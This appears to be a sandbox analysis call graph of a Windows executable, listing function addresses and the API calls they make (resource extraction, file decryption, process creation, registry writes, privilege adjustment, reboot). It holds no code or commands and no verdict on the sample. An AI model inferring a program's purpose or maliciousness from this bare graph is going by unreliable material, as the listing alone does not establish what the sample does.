2364->2366 2365->2364 2365->2366 2368 e6af4 2365->2368 2367 e6bd6 _ismbblead 2366->2367 2369 e6c1e 2366->2369 2372 e6bbe exit 2366->2372 2378 e2bfb GetVersion 2366->2378 2367->2366 2369->2368 2371 e6c27 _cexit 2369->2371 2371->2368 2372->2366 2374 e717e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 2373->2374 2375 e717a 2373->2375 2377 e71cd 2374->2377 2375->2374 2376 e71e2 2375->2376 2376->2358 2377->2376 2379 e2c0f 2378->2379 2380 e2c50 2378->2380 2379->2380 2381 e2c13 GetModuleHandleW 2379->2381 2395 e2caa memset memset memset 2380->2395 2381->2380 2383 e2c22 GetProcAddress 2381->2383 2383->2380 2392 e2c34 2383->2392 2385 e2c8e 2386 e2c9e 2385->2386 2387 e2c97 CloseHandle 2385->2387 2386->2366 2387->2386 2392->2380 2393 e2c89 2489 e1f90 2393->2489 2506 e468f FindResourceA SizeofResource 2395->2506 2398 e2ef3 2401 e44b9 20 API calls 2398->2401 2399 e2d2d CreateEventA SetEvent 2400 e468f 7 API calls 2399->2400 2402 e2d57 2400->2402 2403 e2d6e 2401->2403 2404 e2d5b 2402->2404 2406 e2e1f 2402->2406 2409 e468f 7 API calls 2402->2409 2407 e6ce0 4 API calls 2403->2407 2405 e44b9 20 API calls 2404->2405 2405->2403 2511 e5c9e 2406->2511 2410 e2c62 2407->2410 2412 e2d9f 2409->2412 2410->2385 2436 e2f1d 2410->2436 2412->2404 2415 e2da3 CreateMutexA 2412->2415 2413 e2e3a 2416 e2e52 FindResourceA 2413->2416 2417 e2e43 2413->2417 2414 e2e30 2414->2398 2415->2406 2418 e2dbd GetLastError 2415->2418 2421 e2e6e 2416->2421 2422 e2e64 LoadResource 2416->2422 2537 e2390 2417->2537 2418->2406 2420 e2dca 2418->2420 2424 e2dea 2420->2424 2425 e2dd5 2420->2425 2423 e2e4d 2421->2423 2552 e36ee GetVersionExA 2421->2552 2422->2421 2423->2403 2426 e44b9 20 API calls 2424->2426 2427 e44b9 20 API calls 2425->2427 2428 e2dff 2426->2428 2430 e2de8 2427->2430 2428->2406 2431 e2e04 CloseHandle 2428->2431 2430->2431 2431->2403 2435 e6517 24 API calls 2435->2423 2437 e2f3f 2436->2437 2438 e2f6c 2436->2438 2440 e2f5f 2437->2440 2641 e51e5 2437->2641 2660 e5164 2438->2660 2788 e3a3f 2440->2788 2442 e2f71 2472 e303c 2442->2472 2673 e55a0 2442->2673 2448 e6ce0 4 API calls 2450 e2c6b 2448->2450 2449 e2f86 GetSystemDirectoryA 2451 e658a CharPrevA 2449->2451 2476 e52b6 2450->2476 2452 e2fab LoadLibraryA 2451->2452 2453 e2ff7 FreeLibrary 2452->2453 2454 e2fc0 GetProcAddress 2452->2454 2455 e3006 2453->2455 2456 e3017 SetCurrentDirectoryA 2453->2456 2454->2453 2457 e2fd6 DecryptFileA 2454->2457 2455->2456 2721 e621e GetWindowsDirectoryA 2455->2721 2458 e3026 2456->2458 2459 e3054 2456->2459 2457->2453 2464 e2ff0 2457->2464 2462 e44b9 20 API calls 2458->2462 2460 e3061 2459->2460 2731 e3b26 2459->2731 2466 e307a 2460->2466 2460->2472 2740 e256d 2460->2740 2468 e3037 2462->2468 2464->2453 2470 e3098 2466->2470 2751 e3ba2 2466->2751 2807 e6285 GetLastError 2468->2807 2470->2472 2473 e30af 2470->2473 2472->2448 2809 e4169 2473->2809 2477 e52d6 2476->2477 2486 e5316 2476->2486 2480 e5300 LocalFree LocalFree 2477->2480 2482 e52eb SetFileAttributesA DeleteFileA 2477->2482 2478 e5374 2479 e538c 2478->2479 3115 e1fe1 2478->3115 2481 e6ce0 4 API calls 2479->2481 2480->2477 2480->2486 2484 e2c72 2481->2484 2482->2480 2484->2385 2484->2393 2485 e535e SetCurrentDirectoryA 2488 e2390 13 API calls 2485->2488 2486->2478 2486->2485 2487 e65e8 4 API calls 2486->2487 2487->2485 2488->2478 2490 e1f9a 2489->2490 2491 e1f9f 2489->2491 2492 e1ea7 15 API calls 2490->2492 2493 e1fc0 2491->2493 2496 e44b9 20 API calls 2491->2496 2497 e1fd9 2491->2497 2492->2491 2494 e1fcf ExitWindowsEx 2493->2494 2495 e1ee2 GetCurrentProcess OpenProcessToken 2493->2495 2493->2497 2494->2497 2499 e1f23 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2495->2499 2501 e1f0e 2495->2501 2496->2493 2497->2385 2500 e1f6b ExitWindowsEx 2499->2500 2499->2501 2500->2501 2502 e1f1f 2500->2502 2503 e44b9 20 API calls 2501->2503 2504 e6ce0 4 API calls 2502->2504 2503->2502 2505 e1f8c 2504->2505 2505->2385 2507 e46b6 2506->2507 2509 e2d1a 2506->2509 2508 e46be FindResourceA LoadResource LockResource 2507->2508 2507->2509 2508->2509 2510 e46df memcpy_s FreeResource 2508->2510 2509->2398 2509->2399 2510->2509 2517 e5e17 2511->2517 2520 e5cc3 2511->2520 2512 e6ce0 4 API calls 2514 e2e2c 2512->2514 2513 e5dd0 2516 e5dec GetModuleFileNameA 2513->2516 2513->2517 2514->2413 2514->2414 2515 e5ced CharNextA 2515->2520 2516->2517 2518 e5e0a 2516->2518 2517->2512 2587 e66c8 2518->2587 2520->2513 2520->2515 2520->2517 2521 e6218 2520->2521 2524 e5e36 CharUpperA 2520->2524 2530 e5f9f CharUpperA 2520->2530 2531 e5f59 CompareStringA 2520->2531 2532 e6003 CharUpperA 2520->2532 2533 e5edc CharUpperA 2520->2533 2534 e60a2 CharUpperA 2520->2534 2535 e667f IsDBCSLeadByte CharNextA 2520->2535 2592 e658a 2520->2592 2596 e6e2a 2521->2596 2524->2520 2525 e61d0 2524->2525 2526 e44b9 20 API calls 2525->2526 2527 e61e7 2526->2527 2528 e61f7 ExitProcess 2527->2528 2529 e61f0 CloseHandle 2527->2529 2529->2528 2530->2520 2531->2520 2532->2520 2533->2520 2534->2520 2535->2520 2538 e24cb 2537->2538 2539 e23b9 2537->2539 2540 e6ce0 4 API calls 2538->2540 2539->2538 2542 e23e9 FindFirstFileA 2539->2542 2541 e24dc 2540->2541 2541->2423 2542->2538 2550 e2407 2542->2550 2543 e2479 2547 e2488 SetFileAttributesA DeleteFileA 2543->2547 2544 e2421 lstrcmpA 2545 e24a9 FindNextFileA 2544->2545 2546 e2431 lstrcmpA 2544->2546 2548 e24bd FindClose RemoveDirectoryA 2545->2548 2545->2550 2546->2545 2546->2550 2547->2545 2548->2538 2549 e658a CharPrevA 2549->2550 2550->2543 2550->2544 2550->2545 2550->2549 2551 e2390 5 API calls 2550->2551 2551->2550 2556 e3737 2552->2556 2558 e372d 2552->2558 2553 e44b9 20 API calls 2566 e39fc 2553->2566 2554 e6ce0 4 API calls 2555 e2e92 2554->2555 2555->2403 2555->2423 2567 e18a3 2555->2567 2556->2558 2559 e38a4 2556->2559 2556->2566 2603 e28e8 2556->2603 2558->2553 2558->2566 2559->2558 2560 e39c1 MessageBeep 2559->2560 2559->2566 2561 e681f 10 API calls 2560->2561 2562 e39ce 2561->2562 2563 e39d8 MessageBoxA 2562->2563 2564 e67c9 EnumResourceLanguagesA 2562->2564 2563->2566 2564->2563 2566->2554 2568 e19b8 2567->2568 2569 e18d5 2567->2569 2571 e6ce0 4 API calls 2568->2571 2632 e17ee LoadLibraryA 2569->2632 2573 e19d5 2571->2573 2573->2423 2573->2435 2574 e18e5 GetCurrentProcess OpenProcessToken 2574->2568 2575 e1900 GetTokenInformation 2574->2575 2576 e19aa CloseHandle 2575->2576 2577 e1918 GetLastError 2575->2577 2576->2568 2577->2576 2578 e1927 LocalAlloc 2577->2578 2579 e1938 GetTokenInformation 2578->2579 2580 e19a9 2578->2580 2581 e194e AllocateAndInitializeSid 2579->2581 2582 e19a2 LocalFree 2579->2582 2580->2576 2581->2582 2586 e196e 2581->2586 2582->2580 2583 e1999 FreeSid 2583->2582 2584 e1975 EqualSid 2585 e198c 2584->2585 2584->2586 2585->2583 2586->2583 2586->2584 2586->2585 2588 e66d5 2587->2588 2589 e66f3 2588->2589 2591 e66e5 CharNextA 2588->2591 2599 e6648 2588->2599 2589->2517 2591->2588 2593 e659b 2592->2593 2593->2593 2594 e65b8 CharPrevA 2593->2594 2595 e65ab 2593->2595 2594->2595 2595->2520 2602 e6cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2596->2602 2598 e621d 2600 e665d IsDBCSLeadByte 2599->2600 2601 e6668 2599->2601 2600->2601 2601->2588 2602->2598 2604 e2a62 2603->2604 2611 e290d 2603->2611 2605 e2a6e GlobalFree 2604->2605 2606 e2a75 2604->2606 2605->2606 2606->2559 2608 e2955 GlobalAlloc 2608->2604 2609 e2968 GlobalLock 2608->2609 2609->2604 2609->2611 2610 e2a20 GlobalUnlock 2610->2611 2611->2604 2611->2608 2611->2610 2612 e2a80 GlobalUnlock 2611->2612 2613 e2773 2611->2613 2612->2604 2614 e28b2 2613->2614 2615 e27a3 CharUpperA CharNextA CharNextA 2613->2615 2617 e28b7 GetSystemDirectoryA 2614->2617 2616 e27db 2615->2616 2615->2617 2618 e28a8 GetWindowsDirectoryA 2616->2618 2620 e27e3 2616->2620 2619 e28bf 2617->2619 2618->2619 2621 e28d2 2619->2621 2622 e658a CharPrevA 2619->2622 2624 e658a CharPrevA 2620->2624 2623 e6ce0 4 API calls 2621->2623 2622->2621 2625 e28e2 2623->2625 2626 e2810 RegOpenKeyExA 2624->2626 2625->2611 2626->2619 2627 e2837 RegQueryValueExA 2626->2627 2628 e285c 2627->2628 2629 e289a RegCloseKey 2627->2629 2630 e2867 ExpandEnvironmentStringsA 2628->2630 2631 e287a 2628->2631 2629->2619 2630->2631 2631->2629 2633 e1826 GetProcAddress 2632->2633 2634 e1890 2632->2634 2636 e1889 FreeLibrary 2633->2636 2637 e1839 AllocateAndInitializeSid 2633->2637 2635 e6ce0 4 API calls 2634->2635 2638 e189f 2635->2638 2636->2634 2637->2636 2639 e185f FreeSid 2637->2639 2638->2568 2638->2574 2639->2636 2642 e468f 7 API calls 2641->2642 2643 e51f9 LocalAlloc 2642->2643 2644 e522d 2643->2644 2645 e520d 2643->2645 2647 e468f 7 API calls 2644->2647 2646 e44b9 20 API calls 2645->2646 2648 e521e 2646->2648 2649 e523a 2647->2649 2652 e6285 GetLastError 2648->2652 2650 e523e 2649->2650 2651 e5262 lstrcmpA 2649->2651 2653 e44b9 20 API calls 2650->2653 2654 e527e 2651->2654 2655 e5272 LocalFree 2651->2655 2657 e2f4d 2652->2657 2656 e524f LocalFree 2653->2656 2658 e44b9 20 API calls 2654->2658 2655->2657 2656->2657 2657->2438 2657->2440 2657->2472 2659 e5290 LocalFree 2658->2659 2659->2657 2661 e468f 7 API calls 2660->2661 2662 e5175 2661->2662 2663 e517a 2662->2663 2664 e51af 2662->2664 2665 e44b9 20 API calls 2663->2665 2666 e468f 7 API calls 2664->2666 2667 e518d 2665->2667 2668 e51c0 2666->2668 2667->2442 2822 e6298 2668->2822 2671 e51e1 2671->2442 2672 e44b9 20 API calls 2672->2667 2674 e468f 7 API calls 2673->2674 2675 e55c7 LocalAlloc 2674->2675 2676 e55fd 2675->2676 2677 e55db 2675->2677 2678 e468f 7 API calls 2676->2678 2679 e44b9 20 API calls 2677->2679 2680 e560a 2678->2680 2681 e55ec 2679->2681 2682 e560e 2680->2682 2683 e5632 lstrcmpA 2680->2683 2684 e6285 GetLastError 2681->2684 2685 e44b9 20 API calls 2682->2685 2686 e564b LocalFree 2683->2686 2687 e5645 2683->2687 2705 e55f1 2684->2705 2688 e561f LocalFree 2685->2688 2689 e565b 2686->2689 2690 e5696 2686->2690 2687->2686 2688->2705 2697 e5467 49 API calls 2689->2697 2691 e589f 2690->2691 2694 e56ae GetTempPathA 2690->2694 2692 e6517 24 API calls 2691->2692 2692->2705 2693 e6ce0 4 API calls 2695 e2f7e 2693->2695 2696 e56c3 2694->2696 2698 e56eb 2694->2698 2695->2449 2695->2472 2834 e5467 2696->2834 2700 e5678 2697->2700 2703 e586c GetWindowsDirectoryA 2698->2703 2704 e5717 GetDriveTypeA 2698->2704 2698->2705 2702 e44b9 20 API calls 2700->2702 2700->2705 2702->2705 2868 e597d GetCurrentDirectoryA SetCurrentDirectoryA 2703->2868 2706 e5730 GetFileAttributesA 2704->2706 2719 e572b 2704->2719 2705->2693 2706->2719 2710 e597d 34 API calls 2710->2719 2711 e5467 49 API calls 2711->2698 2712 e2630 21 API calls 2712->2719 2714 e57c1 GetWindowsDirectoryA 2714->2719 2715 e658a CharPrevA 2716 e57e8 GetFileAttributesA 2715->2716 2717 e57fa CreateDirectoryA 2716->2717 2716->2719 2717->2719 2718 e5827 SetFileAttributesA 2718->2719 2719->2703 2719->2704 2719->2705 2719->2706 2719->2710 2719->2712 2719->2714 2719->2715 2719->2718 2720 e5467 49 API calls 2719->2720 2864 e6952 2719->2864 2720->2719 2722 e6268 2721->2722 2723 e6249 2721->2723 2724 e597d 34 API calls 2722->2724 2725 e44b9 20 API calls 2723->2725 2727 e625f 2724->2727 2726 e625a 2725->2726 2728 e6285 GetLastError 2726->2728 2729 e6ce0 4 API calls 2727->2729 2728->2727 2730 e3013 2729->2730 2730->2456 2730->2472 2732 e3b2d 2731->2732 2732->2732 2733 e3b72 2732->2733 2734 e3b53 2732->2734 2934 e4fe0 2733->2934 2736 e6517 24 API calls 2734->2736 2737 e3b70 2736->2737 2738 e3b7b 2737->2738 2739 e6298 10 API calls 2737->2739 2738->2460 2739->2738 2741 e2622 2740->2741 2742 e2583 2740->2742 2961 e24e0 GetWindowsDirectoryA 2741->2961 2744 e258b 2742->2744 2745 e25e8 RegOpenKeyExA 2742->2745 2747 e25e3 2744->2747 2749 e259b RegOpenKeyExA 2744->2749 2746 e2609 RegQueryInfoKeyA 2745->2746 2745->2747 2748 e25d1 RegCloseKey 2746->2748 2747->2466 2748->2747 2749->2747 2750 e25bc RegQueryValueExA 2749->2750 2750->2748 2752 e3bdb 2751->2752 2761 e3bec 2751->2761 2753 e468f 7 API calls 2752->2753 2753->2761 2754 e3c03 memset 2754->2761 2755 e3d13 2756 e44b9 20 API calls 2755->2756 2757 e3d26 2756->2757 2760 e6ce0 4 API calls 2757->2760 2758 e468f 7 API calls 2758->2761 2762 e3f60 2760->2762 2761->2754 2761->2755 2761->2757 2761->2758 2763 e3fd7 2761->2763 2764 e3d7b CompareStringA 2761->2764 2766 e3fab 2761->2766 2769 e3f1e LocalFree 2761->2769 2770 e3f46 LocalFree 2761->2770 2774 e3cc7 CompareStringA 2761->2774 2785 e3e10 2761->2785 2969 e1ae8 2761->2969 3010 e202a memset memset RegCreateKeyExA 2761->3010 3036 e3fef 2761->3036 2762->2470 2763->2757 3060 e2267 2763->3060 2764->2761 2764->2763 2768 e44b9 20 API calls 2766->2768 2772 e3fbe LocalFree 2768->2772 2769->2761 2769->2763 2770->2757 2772->2757 2774->2761 2775 e3e1f GetProcAddress 2778 e3f64 2775->2778 2775->2785 2776 e3f92 2777 e44b9 20 API calls 2776->2777 2779 e3fa9 2777->2779 2780 e44b9 20 API calls 2778->2780 2781 e3f7c LocalFree 2779->2781 2782 e3f75 FreeLibrary 2780->2782 2783 e6285 GetLastError 2781->2783 2782->2781 2784 e3f8b 2783->2784 2784->2757 2785->2775 2785->2776 2786 e3eff FreeLibrary 2785->2786 2787 e3f40 FreeLibrary 2785->2787 3050 e6495 2785->3050 2786->2769 2787->2770 2789 e468f 7 API calls 2788->2789 2790 e3a55 LocalAlloc 2789->2790 2791 e3a8e 2790->2791 2792 e3a6c 2790->2792 2794 e468f 7 API calls 2791->2794 2793 e44b9 20 API calls 2792->2793 2795 e3a7d 2793->2795 2796 e3a98 2794->2796 2797 e6285 GetLastError 2795->2797 2798 e3a9c 2796->2798 2799 e3ac5 lstrcmpA 2796->2799 2805 e2f64 2797->2805 2800 e44b9 20 API calls 2798->2800 2801 e3b0d LocalFree 2799->2801 2802 e3ada 2799->2802 2803 e3aad LocalFree 2800->2803 2801->2805 2804 e6517 24 API calls 2802->2804 2803->2805 2806 e3aec LocalFree 2804->2806 2805->2438 2805->2472 2806->2805 2808 e628f 2807->2808 2808->2472 2810 e468f 7 API calls 2809->2810 2811 e417d LocalAlloc 2810->2811 2812 e41a8 2811->2812 2813 e4195 2811->2813 2815 e468f 7 API calls 2812->2815 2814 e44b9 20 API calls 2813->2814 2816 e41a6 2814->2816 2817 e41b5 2815->2817 2816->2472 2818 e41b9 2817->2818 2819 e41c5 lstrcmpA 2817->2819 2821 e44b9 20 API calls 2818->2821 2819->2818 2820 e41e6 LocalFree 2819->2820 2820->2816 2821->2820 2823 e171e _vsnprintf 2822->2823 2833 e62c9 FindResourceA 2823->2833 2825 e62cb LoadResource LockResource 2826 e6353 2825->2826 2829 e62e0 2825->2829 2827 e6ce0 4 API calls 2826->2827 2828 e51ca 2827->2828 2828->2671 2828->2672 2830 e631b FreeResource 2829->2830 2831 e6355 FreeResource 2829->2831 2832 e171e _vsnprintf 2830->2832 2831->2826 2832->2833 2833->2825 2833->2826 2835 e548a 2834->2835 2837 e551a 2834->2837 2894 e53a1 2835->2894 2905 e58c8 2837->2905 2838 e5581 2842 e6ce0 4 API calls 2838->2842 2841 e5495 2841->2838 2847 e550c 2841->2847 2848 e54c2 GetSystemInfo 2841->2848 2849 e559a 2842->2849 2843 e554d 2843->2838 2850 e597d 34 API calls 2843->2850 2844 e553b CreateDirectoryA 2845 e5577 2844->2845 2846 e5547 2844->2846 2851 e6285 GetLastError 2845->2851 2846->2843 2852 e658a CharPrevA 2847->2852 2855 e54da 2848->2855 2849->2705 2858 e2630 GetWindowsDirectoryA 2849->2858 2853 e555c 2850->2853 2854 e557c 2851->2854 2852->2837 2853->2838 2857 e5568 RemoveDirectoryA 2853->2857 2854->2838 2855->2847 2856 e658a CharPrevA 2855->2856 2856->2847 2857->2838 2859 e265e 2858->2859 2860 e266f 2858->2860 2862 e44b9 20 API calls 2859->2862 2861 e6ce0 4 API calls 2860->2861 2863 e2687 2861->2863 2862->2860 2863->2698 2863->2711 2865 e696e GetDiskFreeSpaceA 2864->2865 2866 e69a1 2864->2866 2865->2866 2867 e6989 MulDiv 2865->2867 2866->2719 2867->2866 2869 e59dd GetDiskFreeSpaceA 2868->2869 2870 e59bb 2868->2870 2872 e5ba1 memset 2869->2872 2873 e5a21 MulDiv 2869->2873 2871 e44b9 20 API calls 2870->2871 2874 e59cc 2871->2874 2875 e6285 GetLastError 2872->2875 2873->2872 2876 e5a50 GetVolumeInformationA 2873->2876 2877 e6285 GetLastError 2874->2877 2878 e5bbc GetLastError FormatMessageA 2875->2878 2879 e5a6e memset 2876->2879 2880 e5ab5 SetCurrentDirectoryA 2876->2880 2881 e59d1 2877->2881 2882 e5be3 2878->2882 2883 e6285 GetLastError 2879->2883 2889 e5acc 2880->2889 2886 e6ce0 4 API calls 2881->2886 2884 e44b9 20 API calls 2882->2884 2885 e5a89 GetLastError FormatMessageA 2883->2885 2887 e5bf5 SetCurrentDirectoryA 2884->2887 2885->2882 2888 e5c11 2886->2888 2887->2881 2888->2698 2890 e5b0a 2889->2890 2892 e5b20 2889->2892 2891 e44b9 20 API calls 2890->2891 2891->2881 2892->2881 2917 e268b 2892->2917 2896 e53bf 2894->2896 2895 e171e _vsnprintf 2895->2896 2896->2895 2897 e658a CharPrevA 2896->2897 2901 e5415 GetTempFileNameA 2896->2901 2898 e53fa RemoveDirectoryA GetFileAttributesA 2897->2898 2898->2896 2899 e544f CreateDirectoryA 2898->2899 2900 e543a 2899->2900 2899->2901 2903 e6ce0 4 API calls 2900->2903 2901->2900 2902 e5429 DeleteFileA CreateDirectoryA 2901->2902 2902->2900 2904 e5449 2903->2904 2904->2841 2906 e58d8 2905->2906 2906->2906 2907 e58df LocalAlloc 2906->2907 2908 e5919 2907->2908 2909 e58f3 2907->2909 2912 e658a CharPrevA 2908->2912 2910 e44b9 20 API calls 2909->2910 2915 e5906 2910->2915 2911 e6285 GetLastError 2916 e5534 2911->2916 2913 e5931 CreateFileA LocalFree 2912->2913 2914 e595b CloseHandle GetFileAttributesA 2913->2914 2913->2915 2914->2915 2915->2911 2915->2916 2916->2843 2916->2844 2918 e26b9 2917->2918 2919 e26e5 2917->2919 2920 e171e _vsnprintf 2918->2920 2921 e271f 2919->2921 2922 e26ea 2919->2922 2924 e26cc 2920->2924 2926 e171e _vsnprintf 2921->2926 2932 e26e3 2921->2932 2923 e171e _vsnprintf 2922->2923 2925 e26fd 2923->2925 2928 e44b9 20 API calls 2924->2928 2929 e44b9 20 API calls 2925->2929 2930 e2735 2926->2930 2927 e6ce0 4 API calls 2931 e276d 2927->2931 2928->2932 2929->2932 2933 e44b9 20 API calls 2930->2933 2931->2881 2932->2927 2933->2932 2935 e468f 7 API calls 2934->2935 2936 e4ff5 FindResourceA LoadResource LockResource 2935->2936 2937 e5020 2936->2937 2938 e515f 2936->2938 2939 e5029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2937->2939 2940 e5057 2937->2940 2938->2737 2939->2940 2953 e4efd 2940->2953 2943 e5060 2944 e44b9 20 API calls 2943->2944 2948 e5075 2944->2948 2945 e44b9 20 API calls 2945->2948 2946 e511d 2949 e513a 2946->2949 2951 e44b9 20 API calls 2946->2951 2947 e5110 FreeResource 2947->2946 2948->2946 2948->2947 2949->2938 2952 e514c SendMessageA 2949->2952 2950 e507c 2950->2945 2950->2948 2951->2949 2952->2938 2954 e4f4a 2953->2954 2955 e4980 25 API calls 2954->2955 2960 e4fa1 2954->2960 2958 e4f67 2955->2958 2956 e6ce0 4 API calls 2957 e4fc6 2956->2957 2957->2943 2957->2950 2959 e4b60 FindCloseChangeNotification 2958->2959 2958->2960 2959->2960 2960->2956 2962 e255b 2961->2962 2963 e2510 2961->2963 2965 e6ce0 4 API calls 2962->2965 2964 e658a CharPrevA 2963->2964 2966 e2522 WritePrivateProfileStringA _lopen 2964->2966 2967 e2569 2965->2967 2966->2962 2968 e2548 _llseek _lclose 2966->2968 2967->2747 2968->2962 2970 e1b25 2969->2970 3074 e1a84 2970->3074 2972 e1b57 2973 e658a CharPrevA 2972->2973 2975 e1b8c 2972->2975 2973->2975 2974 e66c8 2 API calls 2976 e1bd1 2974->2976 2975->2974 2977 e1bd9 CompareStringA 2976->2977 2978 e1d73 2976->2978 2977->2978 2979 e1bf7 GetFileAttributesA 2977->2979 2980 e66c8 2 API calls 2978->2980 2981 e1c0d 2979->2981 2982 e1d53 2979->2982 2983 e1d7d 2980->2983 2981->2982 2989 e1a84 2 API calls 2981->2989 2984 e1d64 2982->2984 2985 e1df8 LocalAlloc 2983->2985 2986 e1d81 CompareStringA 2983->2986 2987 e44b9 20 API calls 2984->2987 2985->2984 2988 e1e0b GetFileAttributesA 2985->2988 2986->2985 2995 e1d9b 2986->2995 3002 e1d6c 2987->3002 2990 e1e1d 2988->2990 2991 e1e45 2988->2991 2992 e1c31 2989->2992 2990->2991 3080 e2aac 2991->3080 2993 e1c50 LocalAlloc 2992->2993 2998 e1a84 2 API calls 2992->2998 2993->2984 3001 e1c67 GetPrivateProfileIntA GetPrivateProfileStringA 2993->3001 2994 e6ce0 4 API calls 2997 e1ea1 2994->2997 2995->2995 2999 e1dbe LocalAlloc 2995->2999 2997->2761 2998->2993 2999->2984 3004 e1de1 2999->3004 3003 e1cf8 3001->3003 3008 e1cc2 3001->3008 3002->2994 3005 e1d09 GetShortPathNameA 3003->3005 3006 e1d23 3003->3006 3007 e171e _vsnprintf 3004->3007 3005->3006 3009 e171e _vsnprintf 3006->3009 3007->3008 3008->3002 3009->3008 3011 e209a 3010->3011 3012 e2256 3010->3012 3014 e171e _vsnprintf 3011->3014 3017 e20dc 3011->3017 3013 e6ce0 4 API calls 3012->3013 3015 e2263 3013->3015 3016 e20af RegQueryValueExA 3014->3016 3015->2761 3016->3011 3016->3017 3018 e20fb GetSystemDirectoryA 3017->3018 3019 e20e4 RegCloseKey 3017->3019 3020 e658a CharPrevA 3018->3020 3019->3012 3021 e211b LoadLibraryA 3020->3021 3022 e212e GetProcAddress FreeLibrary 3021->3022 3023 e2179 GetModuleFileNameA 3021->3023 3022->3023 3025 e214e GetSystemDirectoryA 3022->3025 3024 e21de RegCloseKey 3023->3024 3028 e2177 3023->3028 3024->3012 3026 e2165 3025->3026 3025->3028 3027 e658a CharPrevA 3026->3027 3027->3028 3028->3028 3029 e21b7 LocalAlloc 3028->3029 3030 e21ec 3029->3030 3031 e21cd 3029->3031 3033 e171e _vsnprintf 3030->3033 3032 e44b9 20 API calls 3031->3032 3032->3024 3034 e2218 RegSetValueExA RegCloseKey LocalFree 3033->3034 3034->3012 3037 e4016 CreateProcessA 3036->3037 3048 e4106 3036->3048 3038 e40c4 3037->3038 3039 e4041 WaitForSingleObject GetExitCodeProcess 3037->3039 3042 e6285 GetLastError 3038->3042 3044 e4070 3039->3044 3040 e6ce0 4 API calls 3041 e4117 3040->3041 3041->2761 3043 e40c9 GetLastError FormatMessageA 3042->3043 3046 e44b9 20 API calls 3043->3046 3107 e411b 3044->3107 3046->3048 3047 e4096 CloseHandle CloseHandle 3047->3048 3049 e40ba 3047->3049 3048->3040 3049->3048 3051 e64c2 3050->3051 3052 e658a CharPrevA 3051->3052 3053 e64d8 GetFileAttributesA 3052->3053 3054 e64ea 3053->3054 3055 e6501 LoadLibraryA 3053->3055 3054->3055 3056 e64ee LoadLibraryExA 3054->3056 3057 e6508 3055->3057 3056->3057 3058 e6ce0 4 API calls 3057->3058 3059 e6513 3058->3059 3059->2785 3061 e2289 RegOpenKeyExA 3060->3061 3062 e2381 3060->3062 3061->3062 3063 e22b1 RegQueryValueExA 3061->3063 3064 e6ce0 4 API calls 3062->3064 3065 e22e6 memset GetSystemDirectoryA 3063->3065 3066 e2374 RegCloseKey 3063->3066 3067 e238c 3064->3067 3068 e230f 3065->3068 3069 e2321 3065->3069 3066->3062 3067->2757 3070 e658a CharPrevA 3068->3070 3071 e171e _vsnprintf 3069->3071 3070->3069 3072 e233f RegSetValueExA 3071->3072 3072->3066 3075 e1a9a 3074->3075 3077 e1aba 3075->3077 3079 e1aaf 3075->3079 3093 e667f 3075->3093 3077->2972 3078 e667f 2 API calls 3078->3079 3079->3077 3079->3078 3081 e2be6 3080->3081 3082 e2ad4 GetModuleFileNameA 3080->3082 3083 e6ce0 4 API calls 3081->3083 3092 e2b02 3082->3092 3085 e2bf5 3083->3085 3084 e2af1 IsDBCSLeadByte 3084->3092 3085->3002 3086 e2bca CharNextA 3088 e2bd3 CharNextA 3086->3088 3087 e2b11 CharNextA CharUpperA 3089 e2b8d CharUpperA 3087->3089 3087->3092 3088->3092 3089->3092 3091 e2b43 CharPrevA 3091->3092 3092->3081 3092->3084 3092->3086 3092->3087 3092->3088 3092->3091 3098 e65e8 3092->3098 3094 e6689 3093->3094 3095 e66a5 3094->3095 3096 e6648 IsDBCSLeadByte 3094->3096 3097 e6697 CharNextA 3094->3097 3095->3075 3096->3094 3097->3094 3099 e65f4 3098->3099 3099->3099 3100 e65fb CharPrevA 3099->3100 3101 e6611 CharPrevA 3100->3101 3102 e660b 3101->3102 3104 e661e 3101->3104 3102->3101 3102->3104 3103 e663d 3103->3092 3104->3103 3105 e6627 CharPrevA 3104->3105 3106 e6634 CharNextA 3104->3106 3105->3103 3105->3106 3106->3103 3108 e4132 3107->3108 3110 e412a 3107->3110 3111 e1ea7 3108->3111 3110->3047 3112 e1eba 3111->3112 3113 e1ed3 3111->3113 3114 e256d 15 API calls 3112->3114 3113->3110 3114->3113 3116 e2026 3115->3116 3117 e1ff0 RegOpenKeyExA 3115->3117 3116->2479 3117->3116 3118 e200f RegDeleteValueA RegCloseKey 3117->3118 3118->3116 3228 e6a20 __getmainargs 3229 e19e0 3230 e1a24 GetDesktopWindow 3229->3230 3231 e1a03 3229->3231 3233 e43d0 11 API calls 3230->3233 3232 e1a20 3231->3232 3234 e1a16 EndDialog 3231->3234 3236 e6ce0 4 API calls 3232->3236 3235 e1a33 LoadStringA SetDlgItemTextA MessageBeep 3233->3235 3234->3232 3235->3232 3237 e1a7e 3236->3237 3238 e7270 _except_handler4_common 3239 e69b0 3240 e69b5 3239->3240 3248 e6fbe GetModuleHandleW 3240->3248 3242 e69c1 __set_app_type __p__fmode __p__commode 3243 e69f9 3242->3243 3244 e6a0e 3243->3244 3245 e6a02 __setusermatherr 3243->3245 3250 e71ef _controlfp 3244->3250 3245->3244 3247 e6a13 3249 e6fcf 3248->3249 3249->3242 3250->3247 3251 e34f0 3252 e3504 3251->3252 3253 e35b8 3251->3253 3252->3253 3254 e35be GetDesktopWindow 3252->3254 3255 e351b 3252->3255 3256 e3526 3253->3256 3260 e3671 EndDialog 3253->3260 3257 e43d0 11 API calls 3254->3257 3258 e354f 3255->3258 3259 e351f 3255->3259 3261 e35d6 3257->3261 3258->3256 3263 e3559 ResetEvent 3258->3263 3259->3256 3262 e352d TerminateThread EndDialog 3259->3262 3260->3256 3264 e361d SetWindowTextA CreateThread 3261->3264 3265 e35e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3261->3265 3262->3256 3266 e44b9 20 API calls 3263->3266 3264->3256 3267 e3646 3264->3267 3265->3264 3268 e3581 3266->3268 3269 e44b9 20 API calls 3267->3269 3270 e359b SetEvent 3268->3270 3272 e358a SetEvent 3268->3272 3269->3253 3271 e3680 4 API calls 3270->3271 3271->3253 3272->3256 3273 e6ef0 3274 e6f2d 3273->3274 3276 e6f02 3273->3276 3275 e6f27 ?terminate@ 3275->3274 3276->3274 3276->3275

                                                                                                                                                                                                      Callgraph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
